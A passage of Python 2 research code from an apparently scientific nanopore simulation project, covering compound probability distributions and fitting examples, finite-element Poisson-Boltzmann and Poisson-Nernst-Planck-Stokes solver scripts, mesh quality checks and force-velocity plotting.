In other words, [X, Y][i] where i ~ Bernoulli(1/(1+w))"""
# fitting is biased to X being more likely, to get a unique order
parameters = OrderedDict([("X", 1.), ("Y", 1.), ("w", 5.)])
derived_from = ["X", "Y"]
def sample_(self, shape, X, Y, w):
x = self.X.sample_(shape, **X)
y = self.Y.sample_(shape, **Y)
chose_y = np.bool_(stats.bernoulli.rvs(1./(1. + w), size=shape))
x[chose_y] = y[chose_y]
return x
def pdf_(self, x, X, Y, w):
p = 1./(1. + w)
return (1. - p)*self.X.pdf_(x, **X) + p*self.Y.pdf_(x, **Y)
def cdf_(self, x, X, Y, w):
p = 1./(1. + w)
return (1. - p)*self.X.cdf_(x, **X) + p*self.Y.cdf_(x, **Y)
class TruncateLeft(RandomVariable):
"RV conditioned on X > xmin"
parameters = dict(X=1., xmin=0.1)
derived_from = ["X"]
def sample_(self, shape, X, xmin):
# TODO
pass
def pdf_(self, x, X, xmin):
mass = (1. - self.X.cdf_(xmin, **X)) + 1e-10
return self.X.pdf_(x, **X) * (1.*(x > xmin))/mass
def cdf_(self, x, X, xmin):
Fx = self.X.cdf_(x, **X)
Fxmin = self.X.cdf_(xmin, **X)
mass = (1. - Fxmin) + 1e-10
return np.maximum((Fx - Fxmin)/mass, 0.)
def DoubleExponential(tau1=1., tau2=1., w=None):
#w = p/(1.-p) if p is not None else None
X = Exponential(tau=tau1)
Y = Exponential(tau=tau2)
return OneOf(X=X, Y=Y, w=w)
def LeftTruncatedDoubleExponential(tau1=1., tau2=1., w=None, tmin=0.5):
#w = p/(1.-p) if p is not None else None
X = LeftTruncatedExponential(tau=tau1, tmin=tmin)
Y = LeftTruncatedExponential(tau=tau2, tmin=tmin)
return OneOf(X=X, Y=Y, w=w)
def LeftTruncatedGamma(K=1., tau=1., tmin=0.1):
X = Gamma(K=K, tau=tau)
return TruncateLeft(X=X, xmin=tmin)
def LeftTruncatedDoubleGammaPoisson(a1=1., tau1=1., a2=1., tau2=1., tmin=0.1, w=None):
K1 = ZeroTruncatedPoisson(a=a1)
K2 = ZeroTruncatedPoisson(a=a2)
T1 = LeftTruncatedGamma(K=K1, tau=tau1, tmin=tmin)
T2 = LeftTruncatedGamma(K=K2, tau=tau2, tmin=tmin)
return OneOf(X=T1, Y=T2, w=w)
if __name__ == "__main__":
# decide which example to run
example1 = False
example2 = False
example3 = True
if example1: # example with stacked Gamma-Poisson-Distributions
# construct target distribution
K = ZeroTruncatedPoisson(a=20.) # Assigning a constant means fixing the parameter
Ta = Gamma(K=K, tau=0.005) # An RV as parameter generates a compound distr.
N = ZeroTruncatedPoisson(a=100.*Ta) # RVs can be multiplied by scalar
T = 1e-3*Gamma(K=N)
# get samples
sample1 = Ta.sample(1000)
sample = T.sample(1000)
# construct fitting distribution
K = ZeroTruncatedPoisson(a=None) # None means it will be fitted
Ta = Gamma(K=K, tau=None)
N = ZeroTruncatedPoisson(a=None*Ta)
N.a.constants["t"] = 50. # intiial guess t=1. would not work
T = None*Gamma(K=N)
# fitting methods
method = "pdf" # or "cdf"; pdf seems to be more robust for large data,
# cdf is obviously better for small data because it is smoother
log = True # True should yield better fits for exponential-type distributions
# first fit Ta and fix parameters, then fit T
Ta.fit(sample1, method=method, log=log)
Ta.fix()
T.fit(sample, method=method, log=log)
# alternatively, simply treat Ta as coming from a fixed empirical dist.
Ta_alt = Empirical(sample1)
N_alt = ZeroTruncatedPoisson(a=None*Ta_alt)
T_alt = None*Gamma(K=N_alt)
T_alt.fit(sample, method=method, log=log)
# alternatively, just fit an Exponential
T_exp = None*Exponential()
T_exp.fit(sample, method=method, log=log)
# plot fitted cdf vs. empirical cdf from sample
tt = grid(sample, 100, 0.005, log=True)
plt.figure("cdf")
Ta.compare_cdfs(sample1, log=True)
T.compare_cdfs(sample, log=True)
T_alt.plot_cdf(tt, ":k")
T_exp.plot_cdf(tt, "--b")
plt.figure("pdf")
Ta.compare_pdfs(sample1, log=True)
T.compare_pdfs(sample, log=True)
T_alt.plot_pdf(tt, ":k", log=True)
T_exp.plot_pdf(tt, "--b", log=True)
print "\nT", T
print "\nT_alt", T_alt
print "\nT_exp", T_exp
if example2: # combinations of Exponential variables
tmin = 0.005
sample = LeftTruncatedDoubleExponential(
tau1=0.01, tau2=1., w=1., tmin=tmin).sample(10000)
T = LeftTruncatedDoubleExponential(
tau1=None, tau2=None, w=None, tmin=tmin)
T.fit(sample, method="cdf", log=True, sigma=2., factor=0.6)
plt.figure("cdf")
T.compare_cdfs(sample, log=True)
plt.figure("pdf")
T.compare_pdfs(sample, log=True)
print T
if example3: # Double Gamma example where variables are interlinked
sample = DoubleExponential(tau1=0.01, tau2=1., w=2.).sample(10000)
a1 = Constant(c=None)
a2 = .005
w = Function(lambda x: x/a2, a1)
K1 = ZeroTruncatedPoisson(a=a1)
K2 = ZeroTruncatedPoisson(a=a2)
T1 = Gamma(K=K1, tau=None)
T1.update(tau=0.0001)
T2 = Gamma(K=K2, tau=None)
T = OneOf(X=T1, Y=T2, w=w)
T.fit(sample, log=True, sigma=2., factor=0.7)
T.compare_pdfs(sample, log=True)
```
#### File: scripts/finfet/test_wire.py
```python
from nanopores import generate_mesh, geo_from_name, Poisson, PoissonProblem, qq, PB, PBProblem, import_vars, params_physical, get_mesh, u_to_matlab, IllposedNonlinearSolver
from dolfin import *
from random import random
t = Timer("time")
geo_name = "Nanowire"
globals().update(import_vars("nanopores.%s.params_geo" % geo_name))
def random_dopant_positions(N, **params):
# create N random points in unit cube
x = [[random() for i in range(3)] for i in range(N)]
# affine transformation on transducer
rr = params["r_eff"]
ll = params["l"]
T = lambda x : [x[0]*(w_core - 2*rr) + x_core + rr, x[1]*(ll - 2*rr) + rr,
x[2]*(h_core - 2*rr) + z_core + rr]
return map(T, x)
N = 5 # number of impurity atoms in pore
l = 10 # length of wire [nm]
clscale = 1.0 # mesh width scale
Nsamples = 1 # number of samples
r_eff = 3 # effective radius [nm]
voltage = -3 # voltage drop across 1000 nm wire [V]
# change physical parameters
#params_physical.permanent_charge["impurity"] = 1e6
#params_physical.permittivity["impurity"] = ???
#params_physical.ion_concentration["impurity"] = ???
geo_params = dict(l = l*1e-9, r_eff = r_eff*1e-9, lc = 10e-9)
generate_mesh(clscale, geo_name, **geo_params) # constructs the mesh
mesh = get_mesh(geo_name)
print "CPU Time (mesh generation):",t.stop()
print "Number of cells:",mesh.num_cells()
PB.adapt = PB.rebuild
PB.maxcells = 5000000
PB.marking_fraction = 0.9
PB.tolnewton = 1e-5
#IllposedNonlinearSolver.newtondamp = 0.9
u0 = Function(PBProblem.space(mesh))
for k in range(Nsamples):
print "\n --- Sample %d of %d" %(k+1, Nsamples)
# xi = list of dopant positions
xi = random_dopant_positions(N, **geo_params)
geo = geo_from_name(geo_name, mesh=mesh, check_midpoint=True, xi=xi, **geo_params)
t.start()
pde = PB(geo, bV=-1.0)
#rho = geo.pwconst("permanent_charge")
#pde = Poisson(geo, bV=-0.0, f=rho)
pde.solve(refinement = False)
print "CPU Time (solving):",t.stop()
(u,) = pde.solutions()
u0.vector()[:] = u0.vector()[:] + u.vector()[:]/Nsamples
#mesh_core = geo.submesh("core")
#geo_core = geo_from_name("Nanowire", mesh=mesh_core, check_midpoint=True, xi=xi, **geo_params)
#plot(geo_core.boundaries)
# compute current
from nanopores.physics.params_physical import UT, qq
ni = 1e16
mup = 100*1e4
mun = 1000*1e4
phiF = params_physical.fermi_level["sil"]
E = -voltage/1000e-9
dx = geo.dx("core")
p = ni*exp(-(u0 - phiF)/UT)
n = ni*exp((u0 - phiF)/UT)
Jp = qq*mup*p*E
Jn = qq*mun*n*E
j0 = Jp + Jn
I = assemble(j0*dx)/l
print "current: ", I
#j1 = Constant(qq*E*ni/l)*(mup*exp(-(u0 - phiF)/UT) + mun*exp((u0 - phiF)/UT))
#I1 = assemble(j1*dx)
#u_to_matlab(mesh, u0, "potential")
#plot(u, title="example potential")
plot(u0, title="average potential")
#pde.functions["PBProblem"] = u0
#pde.visualize("core")
interactive()
```
#### File: scripts/howorka/interpolation_points.py
```python
"create 2D point set for Howorka model where force shall be evaluated."
import numpy as np
from itertools import product
import math
import matplotlib.pyplot as plt
import nanopores
gauss = np.polynomial.legendre.leggauss
nanopores.add_params(
h = 0.5,
hout = 1.,
Ry = 10.,
Rx = 3.,
)
def points(h, hout, r0, r, l0, Rx, Ry):
# effective pore radius for molecule
R = r0 - r
# get scaled 1D gauss quadrature nodes
# for x grid inside pore
# this has h = h/2 to resolve the thin region
k = int(math.ceil(R/h*2.))
x, w = gauss(2*k + 1)
x = R*x[k:]
# get uniform y grid inside pore
m = int(math.ceil(2.*l0/h))
y = np.linspace(-l0-r+h/2, l0+r-h/2, m)
# list of (x,y) values in pore
Xpore = list(product(x, y))
# gauss x grid outside
l = int(math.ceil(Rx/h))
x, w = gauss(2*l)
x = Rx-Rx*x[l:]
#x = np.linspace(0., Rx, l)
# gauss y grid outside
L = (Ry-l0-r)
n = int(math.ceil(L/hout))
y, w = gauss(2*n)
yp = l0+r + L + L*y[:n]
ym = -yp
Xtop = list(product(x, yp))
Xbot = list(product(x, ym))
# combine
X = Xtop + Xpore + Xbot
return X
# TODO: more points at edge y=l0 in x=0,r0 ?
# load parameters and create points
from nanopores.tools import fields
from nanopores.geometries.H_cyl_geo.params_geo import r0, rMolecule, l0, r1
X = points(h, hout, r0, rMolecule, l0/2, r1 + rMolecule, Ry)
x, y = [z[0] for z in X], [z[1] for z in X]
plt.scatter(x, y)
plt.show()
#fields.save_entries("xforce", PARAMS, X=X, N=len(X))
#print "Created and stored %d evaluation points." %(len(X),)
#fields.update()
```
#### File: scripts/howorka/plot_selectivity_old.py
```python
import nanopores, numpy
import matplotlib.pyplot as plt
Qs = [-1.,-3.]
NAME = "howorka2D_selectivity_Q%.0f"
label = r"$Q = %.0f$"
def avg(J):
n = len(J)
J0 = list(numpy.array(J)[n*0.2:n*0.5])
return sum(J0)/len(J0)
Javg = []
for Q in Qs:
results, params = nanopores.load_stuff(NAME % Q)
t = results["time"]
J = results["current"]
rel = results["release"]
plt.figure(0)
plt.semilogx(t, rel, "x-", label=label % Q)
plt.xlabel("time [s]")
plt.ylabel("% release")
plt.title("reservoir size: %.0f nm" % (params["Ry"],))
plt.ylim(ymin=0.)
plt.figure(1)
plt.semilogx(t, J, "x-", label=label % Q)
plt.xlabel("time [s]")
plt.ylabel("current through pore [1/ms]")
plt.ylim(ymin=0.)
# determine average current
Javg.append(avg(J))
plt.plot(t, [Javg[-1]]*len(t), "k--", label="%.1f" % Javg[-1])
plt.title("selectivity: %.1f / %.1f = %.1f" % (
max(Javg), min(Javg), max(Javg)/min(Javg)))
plt.figure(0)
plt.legend(loc="best")
plt.figure(1)
#plt.plot(t, [0.]*len(t), "k-")
plt.legend(loc="best")
plt.show()
```
#### File: scripts/numerics/analyticalPNPS_uncoupled_2D.py
```python
" analytical test problem to validate 2D and 3D solvers "
import math
from dolfin import *
from nanopores import *
from nanopores.physics.simplepnps import *
# --- define parameters ---
bV = -0.05 # [V]
rho = -0.025 # [C/m**2]
initialh = .1
Nmax = 1e4
# --- create 2D geometry ---
Rz = 2. # [nm] length in z direction of channel part
R = 2. # [nm] pore radius
hcross = .2
domain2D = Box([0., -Rz], [R, Rz])
cross = Box([0., 0.], [R, hcross])
domain2D.addsubdomains(
main = domain2D - cross,
cross = cross,
)
domain2D.addboundaries(
lowerb = domain2D.boundary("bottom"),
upperb = domain2D.boundary("top"),
wall = domain2D.boundary("right"),
cross = cross.boundary("bottom"),
center = domain2D.boundary("left")
)
domain2D.params["lscale"] = 1e9
domain2D.synonymes = dict(
fluid = {"main", "cross"},
pore = "fluid",
chargedmembraneb = "wall",
noslip = "wall",
nopressure = "center",
bulk = {"upperb", "lowerb"},
#nocbc = {"lowerb"},
)
geo2D = domain2D.create_geometry(lc=initialh)
#mesh = geo2D.mesh
#boundary = MeshFunction("size_t", mesh, 1)
#boundary.set_all(0)
#DomainBoundary().mark(boundary, 2)
#plot(boundary)
#domain2D.plot()
# --- create geometry for 1D crossection ---
# TODO: it would be cool if the 1D domain could be extracted from the 2D one
# (should be pretty easy)
domain1D = Interval(0., R)
domain1D.addsubdomain(domain1D, "fluid")
domain1D.addboundaries(
wall = domain1D.boundary("right"),
center = domain1D.boundary("left")
)
domain1D.params["lscale"] = 1e9
domain1D.synonymes = dict(
pore = "fluid",
chargedmembraneb = "wall",
)
geo1D = domain1D.create_geometry(lc=.001)
# --- define physical parameters for 1D problem ---
phys_params = dict(
Membraneqs = rho,
bulkcon = 300,
v0 = {}
)
phys = Physics("pore", geo1D, **phys_params)
# --- solve 1D problem for "exact" solution ---
pb = solve_pde(SimplePBProblem, geo1D, phys, cyl=True, iterative=False, tolnewton=1e-10)
# define expression for interpolation into 2D
phi = pb.solution
UT = phys.UT
c0 = phys.bulkcon
D = phys.DPore
lscale = phys.lscale
E0 = -lscale*bV/(2.*Rz)
eps = phys.permittivity["water"]
eta = phys.eta
print "Diffusion constant in pore:", D*1e9, "[nm**2/ns]"
print "Constant electric field:", E0, "[V/m]"
def cpPB(x):
return c0*exp(-phi(x)/UT)
def cmPB(x):
return c0*exp(phi(x)/UT)
def pPB(x):
return -2.*c0*cFarad*UT*(math.cosh(phi(x)/UT) - math.cosh(phi(0.)/UT))
def uPB(x):
return eps*E0/eta*(phi(x[0]) - phi(R))
class vPB(Expression):
def eval(self, value, x):
value[0] = bV*x[1]/(2.*Rz) + phi(x[0])
class JpPB(Expression):
def eval(self, value, x):
value[0] = D/UT*E0*cpPB(x[0])
class JmPB(Expression):
def eval(self, value, x):
value[0] = -D/UT*E0*cmPB(x[0])
# compute current
r2pi = Expression("2*pi*x[0]")
J_PB = assemble(Constant(cFarad*D/UT*E0*c0/lscale**2)*(exp(-phi/UT) + exp(phi/UT))*r2pi*dx)
print "J (PB): %s [A]" % J_PB
# --- define physical parameters and customized BCs of 2D problem ---
# constant Dirichlet BCs for v, cp, cm on wall,
# non-zero flux BCs on top/bottom
n = FacetNormal(geo2D.mesh)
lscale = Constant(phys.lscale)
phys_params.update(
cp0 = dict(wall = c0*exp(-phi(R)/UT)),
cm0 = dict(wall = c0*exp(+phi(R)/UT)),
v0 = dict(wall = vPB()),
cpflux = dict(bulk = JpPB()*n[1]),
cmflux = dict(bulk = JmPB()*n[1]),
)
phys = Physics("pore", geo2D, **phys_params)
phys.surfcharge.update(
upperb = lscale*eps*bV/(2.*Rz),
lowerb = -lscale*eps*bV/(2.*Rz),
)
# --- solve 2D PNP+Stokes problem ---
# the goal functional: current through crosssection
grad = phys.grad
def J(U, geo):
v, cp, cm = U
Jp = Constant(D)*(-grad(cp) - Constant(1/UT)*cp*grad(v))
Jm = Constant(D)*(-grad(cm) + Constant(1/UT)*cm*grad(v))
Jsurf = avg(Constant(cFarad/lscale**2)*(Jp - Jm)[1] * r2pi) * geo.dS("cross")
Jvol = Constant(cFarad/lscale**2/hcross)*(Jp - Jm)[1] * r2pi * geo.dx("cross")
return dict(Jsurf=Jsurf, Jvol=Jvol)
def saveJ(self):
self.save_estimate("(Jsing_h - J)/J", abs((self.functionals["Jsurf"].value()-J_PB)/J_PB),
N=self.solution.function_space().dim())
self.save_estimate("(J_h - J)/J", abs((self.functionals["Jvol"].value()-J_PB)/J_PB),
N=self.solution.function_space().dim())
# solve #inside_loop=saveJ,
pnps = solve_pde(SimplePNPProblem, geo2D, phys, cyl=True, newtondamp=1., goals=[J],
refinement=True, marking_fraction=.5, maxcells=Nmax, iterative=False)
pnps.visualize()
exit()
v, cp, cm = pnps.solutions()
stokes = solve_pde(SimpleStokesProblem, geo2D, phys, cyl=True, conservative=False, f=-cFarad*(cp-cm)*grad(v), ku=2, beta=0.)
# --- visualization ---
#plot(-cFarad*(cp-cm)*grad(v)[1]/(lscale**2*eta), title="electroosmotic forcing [m/s]")
#pnps.visualize()
#stokes.visualize()
(u, p) = stokes.solutions()
#fig = plot1D({"phi PB":phi}, (0., R, 101), "x", dim=1, axlabels=("r [nm]", "potential [V]"))
#plot1D({"phi PNP (2D)": v}, (0., R, 101), "x", dim=2, axlabels=("r [nm]", "potential [V]"), fig=fig)
#fig = plot1D({"c+ PB":cpPB, "c- PB":cmPB}, (0., R, 101), "x", dim=1, axlabels=("r [nm]", "concentration [mol/m**3]"))
#plot1D({"c+ PNP (2D)": cp, "c- PNP (2D)": cm}, (0., R, 101), "x", origin=(0.,-Rz), dim=2, axlabels=("r [nm]", "concentration [mol/m**3]"), fig=fig)
#plot1D({"c+ PNP (2D)": cp, "c- PNP (2D)": cm, "c+ PB":lambda x: cpPB(0.), "c- PB":lambda x: cmPB(0.)},
# (-Rz, Rz, 101), "y", origin=(.0*R, 0.), dim=2, axlabels=("z [nm]", "concentration [mol/m**3]"))
fig = plot1D({"uz PB":uPB}, (0., R, 101), "x", dim=1, axlabels=("r [nm]", "velocity [m/s]"))
fig = plot1D({"uz PNP (2D)":u[1]}, (0., R, 101), "x", dim=2, axlabels=("r [nm]", "velocity [m/s]"), fig=fig)
#fig = plot1D({"ur PB":lambda x:0.}, (0., R, 101), "x", dim=1, axlabels=("r [nm]", "velocity [m/s]"))
#fig = plot1D({"ur PNP (2D)":u[0]}, (0., R, 101), "x", dim=2, axlabels=("r [nm]", "velocity [m/s]"), fig=fig)
fig = plot1D({"p PB":pPB}, (0., R, 101), "x", dim=1, axlabels=("r [nm]", "velocity [m/s]"))
fig = plot1D({"p PNP (2D)":p}, (0., R, 101), "x", dim=2, axlabels=("r [nm]", "velocity [m/s]"), fig=fig)
#pnps.estimators["(Jsing_h - J)/J"].plot(rate=-1.)
#pnps.estimators["(J_h - J)/J"].plot(rate=-1.)
showplots()
```
#### File: scripts/numerics/H3Drefine.py
```python
" assess mesh quality of howorka geometry and how it changes with uniform refinement and snapping "
from nanopores import *
from nanopores.geometries.curved import Cylinder, Sphere, Circle
from dolfin import *
from matplotlib import pyplot
geo_name = "H_cyl_geo"
nm = import_vars("nanopores.geometries.%s.params_geo" %geo_name)["nm"]
add_params(
h = 3.,
z0 = 2.,
ratio = .1,
nref = 1,
)
geo_params = dict(
x0 = [0., 0., nm*z0],
rMolecule = nm*0.5,
lcCenter = nm*0.1, #1,
lcMolecule = nm*0.05, #025,
)
generate_mesh(h, geo_name, optimize=True, **geo_params)
geo = geo_from_name(geo_name, **geo_params)
print geo._bou2phys
#plot(geo.submesh("pore"))
plot_sliced(geo)
# define sphere for molecule
molec = Sphere(R=geo.params["rMolecule"], center=geo.params["x0"])
# define cylinders for inner and outer DNA boundary and side boundary
innerdna = Cylinder(R=geo.params["r0"], L=geo.params["l0"])
outerdna = Cylinder(R=geo.params["r1"], L=geo.params["l0"])
side = Cylinder(R=geo.params["R"], L=2.*geo.params["Rz"])
curved = dict(
moleculeb = molec.snap,
innerdnab = innerdna.snap,
outerdnab = outerdna.snap,
membranednab = outerdna.snap,
sideb = side.snap,
outermembraneb = side.snap,
)
def mesh_quality(mesh, oldmesh=None, ratio=1e-1):
#vertex = VertexFunction("bool", mesh, False)
dgncells = CellFunction("size_t", mesh, 0)
for c in cells(mesh):
if c.radius_ratio() < ratio:
dgncells[c] = 1
#if c.radius_ratio() < 1e-5:
#print 'Degenerate cell', c.index(), ', radius ratio', c.radius_ratio()
#for v in vertices(c):
#vertex[v] = True
#if c.radius_ratio() < 1e-6:
# print ' ', v.point().str()
minrr = MeshQuality.radius_ratio_min_max(mesh)[0]
print "Minimal radius ratio of mesh:", minrr
pyplot.figure()
exec(MeshQuality.radius_ratio_matplotlib_histogram(mesh, 200), locals())
# plot degenerate cells
if minrr < ratio:
submesh = SubMesh(mesh, dgncells, 1)
title = "degenerate N=%s" %mesh.num_cells()
#plot(submesh, title=title)
geo_sub = geo_from_subdomains(submesh,
"nanopores.geometries.%s.subdomains" %geo.params["name"], **geo.params)
plot(geo_sub.boundaries, title="boundaries "+title)
# find degenerate cells before snapping
if oldmesh is not None:
oldmesh = refine(oldmesh)
oldcells = CellFunction("size_t", oldmesh, 0)
oldcells.array()[:] = dgncells.array()
plot(SubMesh(oldmesh, oldcells, 1), "old degenerate cells N=%s" %mesh.num_cells())
# mesh quality before refinement
mesh = geo.mesh
print "Number of cells:", mesh.num_cells()
mesh_quality(mesh, ratio=ratio)
#interactive()
for i in range(nref):
# Mark cells for refinement
markers = CellFunction("bool", mesh, True)
# Refine mesh
mesh = refine(mesh, markers)
print "Number of cells:", mesh.num_cells()
geo.adapt(mesh)
mesh_quality(mesh, ratio=ratio)
# snap curved boundaries
for boundary, snap in curved.items():
print "Adapting curved boundary '%s'." % boundary
geo.snap_to_boundary(boundary, snap)
mesh_quality(mesh, ratio=ratio)
#areCh = assemble(Constant(1.)*geo.dS("dnab"))
#print "Area (approx):", areCh
#print "Error A:", abs(areCh - areC)
print "hmin [nm]: ", geo.mesh.hmin()/nm
plot_sliced(geo)
interactive()
```
#### File: scripts/numerics/velocity.py
```python
import dolfin, os
import numpy as np
import matplotlib.pyplot as plt
from nanopores.models import Howorka
from nanopores.models.diffusion import friction_tensor, friction
import nanopores.tools.fields as fields
import nanopores
from nanopores import (LinearPBGoalOriented, LinearPBAxisymGoalOriented,
PNPSAxisym, PNPS, StokesProblem, PNPProblem, HOME,
Physics, user_params)
DATADIR = os.path.join(HOME, "Dropbox", "nanopores", "fields")
FIGDIR = os.path.join(HOME, "Dropbox", "nanopores", "figures")
fields.set_dir(DATADIR)
def pbpnps(geo, phys, cyl=False, frac=0.5, Nmax=1e4, cheapest=False,
taylorhood=False, stokesLU=False, **kwargs):
if not stokesLU and not cyl:
StokesProblem.method["iterative"] = True
else:
StokesProblem.method["iterative"] = False
#PNPProblem.method["iterative"] = False
PNPProblem.method["kparams"]["relative_tolerance"] = 1e-10
PNPProblem.method["kparams"]["absolute_tolerance"] = 1e-6
PNPProblem.method["kparams"]["nonzero_intial_guess"] = False
#StokesProblemEqualOrder.beta = 1.
StokesProblem.method["kparams"].update(
monitor_convergence = False,
relative_tolerance = 1e-10,
absolute_tolerance = 1e-5,
maximum_iterations = 2000,
nonzero_initial_guess = True,
)
PNPS.tolnewton = 1e-3
PNPS.alwaysstokes = True
LinearPB = LinearPBAxisymGoalOriented if cyl else LinearPBGoalOriented
PNPStokes = PNPSAxisym if cyl else PNPS
z = phys.dim - 1
bV = phys.bV
phys.bV = 0.
goal = (lambda v : phys.Fbare(v, z)) if geo.parameter("x0") else (lambda v : phys.CurrentPB(v))
pb = LinearPB(geo, phys, goal=goal)
phys.bV = bV
pb.maxcells = Nmax
pb.marking_fraction = frac
if cheapest:
pb.estimate = pb.estimate_cheap
refined = True
i = 0
print "Number of cells:", pb.geo.mesh.num_cells()
while refined:
i += 1
print "\nSolving PB."
pb.single_solve()
print "\nError estimation."
(ind, err) = pb.estimate()
print "\nMesh refinement."
refined = pb.refine(ind)
if not refined:
print "Maximal number of cells reached."
else:
print "New total number of cells:", pb.geo.mesh.num_cells()
pnps = PNPStokes(pb.geo, phys, v0=pb.solution, taylorhood=taylorhood)
print "\nSolving PNPS."
dofs = pnps.dofs()
print " Degrees of freedom: %d" % dofs
newton_iter = pnps.newton_solve()
print " Newton iterations:", newton_iter
return pb, pnps
def pnps(geo, phys, cyl=False, taylorhood=False, stokesLU=True, **kwargs):
if not stokesLU and not cyl:
StokesProblem.method["iterative"] = True
else:
StokesProblem.method["iterative"] = False
#PNPProblem.method["iterative"] = False
PNPProblem.method["kparams"]["relative_tolerance"] = 1e-10
PNPProblem.method["kparams"]["absolute_tolerance"] = 1e-6
PNPProblem.method["kparams"]["nonzero_intial_guess"] = False
#StokesProblemEqualOrder.beta = 1.
StokesProblem.method["kparams"].update(
monitor_convergence = False,
relative_tolerance = 1e-10,
absolute_tolerance = 1e-5,
maximum_iterations = 2000,
nonzero_initial_guess = True,
)
PNPS.tolnewton = 1e-3
PNPS.alwaysstokes = True
PNPStokes = PNPSAxisym if cyl else PNPS
pnps = PNPStokes(geo, phys, taylorhood=taylorhood)
print "\nSolving PNPS."
dofs = pnps.dofs()
print " Degrees of freedom: %d" % dofs
newton_iter = pnps.newton_solve()
print " Newton iterations:", newton_iter
return pnps
<EMAIL>("howorka_nonzero_u")
#def F(x, v=None, dim=3, **params):
# values = []
# setup = Howorka.setup3D if dim==3 else Howorka.setup2D
# cyl = dim==2
# for x0 in x:
# geo, phys = setup(x0=x0, **params)
# if v is not None:
# phys.update(UMol=tuple(v))
# #dolfin.plot(geo.submesh("solid"), key="b", title="solid mesh")
# pb, pnps = pbpnps(geo, phys, cyl=cyl, **params)
# #dolfin.plot(geo.submesh("solid"), key="b", title="solid mesh")
# values.append(pnps.forces())
# pnps.visualize("fluid")
# F, Fel, Fdrag = tuple(zip(*values))
# return dict(F=F, Fel=Fel, Fdrag=Fdrag)
#print F([[0.2,0.,4.6798]], Nmax=5e4, UMol=(0., 0.1, 0.1), dim=3, dnaqsdamp=0.5,
# taylorhood=False, cheapest=True, cache=False, h3D=8.,
# stokesLU=True)
#print F([[0.,0.,4.6798]], Nmax=5e4, UMol=(0., 0.1), dim=2, dnaqsdamp=0.5,
# taylorhood=False, cheapest=True, cache=False, h3D=8.,
# stokesLU=True)
class Values(list):
def __str__(self):
return str(self[-1])
def tolist(self):
return [x.tolist() for x in self]
def velocity_iteration(setup, imax=15):
dim = setup.geop.dim
gamma = friction_tensor(setup) if dim==3 else np.diag([friction(setup)])
geo = setup.geo
#dolfin.plot(geo.boundaries)
#dolfin.interactive()
f, v, dv = Values(), Values(), Values()
# iteratively update v
v.append(np.array([0.]*dim))
for i in range(imax):
print "\n--- Loop %d ---" %(i+1,)
phys = Physics("howorka", geo, **setup.physp)
phys.update(Qmol=phys.Qmol*phys.qq)
phys.update(UMol=tuple(v[-1]))
pde = pnps(geo, phys, cyl=setup.phys.cyl)
Force, Fel, Fdrag = pde.forces()
if dim==2: Force = [Force[1]]
f.append(1e-12*np.array(Force))
print "f =", f
dv0 = np.linalg.solve(gamma, f[-1])
if dim==2: dv0 = np.array([0., float(dv0)])
dv.append(dv0)
print "dv =", dv
v.append(v[-1] + dv[-1])
print "v =", v
#pde.visualize()
v.pop(0)
return f, v, dv
@nanopores.tools.solvers.cache_forcefield("howorka_velo2")
def velocities(X, **params):
v0, v1 = [], []
for x0 in X:
setup = Howorka.Setup(x0=x0, **params)
f, v, dv = velocity_iteration(setup, 6)
assert np.linalg.norm(1e12*f[-1]) < 1e-3
#assert np.linalg.norm(dv[-1]) < 1e-3*np.linalg.norm(dv[0])
v0.append(list(v[0]))
v1.append(list(v[-1]))
return dict(v0=v0, v1=v1)
def velo2force_2D(v, setup):
geo = setup.geo
phys = Physics("howorka", geo, **setup.physp)
phys.update(Qmol=phys.Qmol*phys.qq)
vv = [0.]*setup.geop.dim
vv[-1] = v
phys.update(UMol=tuple(vv))
pde = pnps(geo, phys, cyl=setup.phys.cyl)
v, cp, cm, u, p = pde.solutions()
dolfin.plot(u)
Force, Fel, Fdrag = pde.forces()
return 1e-12*Force[1]
def velo2force_3D(v, setup):
geo = setup.geo
phys = Physics("howorka", geo, **setup.physp)
phys.update(Qmol=phys.Qmol*phys.qq)
phys.update(UMol=tuple(v))
pde = pnps(geo, phys, cyl=setup.phys.cyl)
#v, cp, cm, u, p = pde.solutions()
#dolfin.plot(u)
pde.visualize("fluid")
Force, Fel, Fdrag = pde.forces()
return 1e-12*Force[-1] #[1e-12*f for f in Force]
#<EMAIL>.solvers.cache_forcefield("howorka_veloforce")
def nonzero_velocities_2D(V, **params):
setup = Howorka.Setup(**params)
gamma = friction(setup)
print "friction gamma", gamma
# determine F(0), only once
if not 0. in V:
V.append(0.)
V.sort()
F = [None]*len(V)
i0 = V.index(0.)
F[i0] = velo2force_2D(0., setup)
F0 = F[i0]
print "F(0)", F0
for i, v in enumerate(V):
if not i == i0:
print "\n--- Velocity %d ---" %(i+1,)
F[i] = velo2force_2D(v, setup)
print "Velocity", v
print "Force (exact)", F[i]
print "Force (linear)", F0 - gamma*v
return F, gamma, F0
params = user_params(dim=3, Nmax=1.5e5, h=1., dnaqsdamp=0.25,
x0=[0.2,0.,4.01], Qmol=-1., bulkcon=300.)
setup = Howorka.Setup(**params)
setup.prerefine()
velo2force_3D([0., 0.1, 0.2], setup)
do_v2f = False
redo_v2f = False
if do_v2f:
if redo_v2f:
params = user_params(dim=2, Nmax=2e4, h=.5, dnaqsdamp=0.25,
x0=[0.,0.,4.5], Qmol=-1., bulkcon=300.)
V = list(np.linspace(-1., 1., 3))
F, gamma, F0 = nonzero_velocities_2D(V, **params)
fields.save_entries("howorka_velo2force_3", params, V=V, F=F, gamma=gamma, F0=F0)
fields.update()
dolfin.interactive()
data = fields.load_file("howorka_velo2force_3")
V, F, F0, gamma = tuple(data[key] for key in ["V", "F", "F0", "gamma"])
ax = plt.axes()
ax.axhline(y=0, color='#999999', linewidth=0.5)
ax.axvline(x=0, color='#999999', linewidth=0.5)
#ax.plot(V, [0.]*len(V), "-", color="#999999")
ax.plot(V, [1e12*(F0 - gamma*v) for v in V], "-g", label=r"$F(0) - \gamma v$")
ax.plot(V, [1e12*f for f in F], ".b", label=r"$F(v)$")
ax.set_ylabel("force [pN]")
ax.set_xlabel("velocity [m/s]")
ax.legend(loc="best")
#ax.grid()
fig = plt.gcf()
fig.set_size_inches((4,3))
#nanopores.savefigs("howorka_v2f_2", FIGDIR)
plt.show()
do_profile = False
if do_profile:
# working 3D setup
params = user_params(dim=3, Nmax=1.5e5, h=1., dnaqsdamp=0.25,
Qmol=-1., bulkcon=300.)
# 2D setup
#params = user_params(dim=2, Nmax=2e4, h=.5, dnaqsdamp=0.25,
# Qmol=-1., bulkcon=300.)
# along axis
#Z = np.linspace(-6., 6., 42)
#X = [[0.,0.,z] for z in Z]
# at crosssection
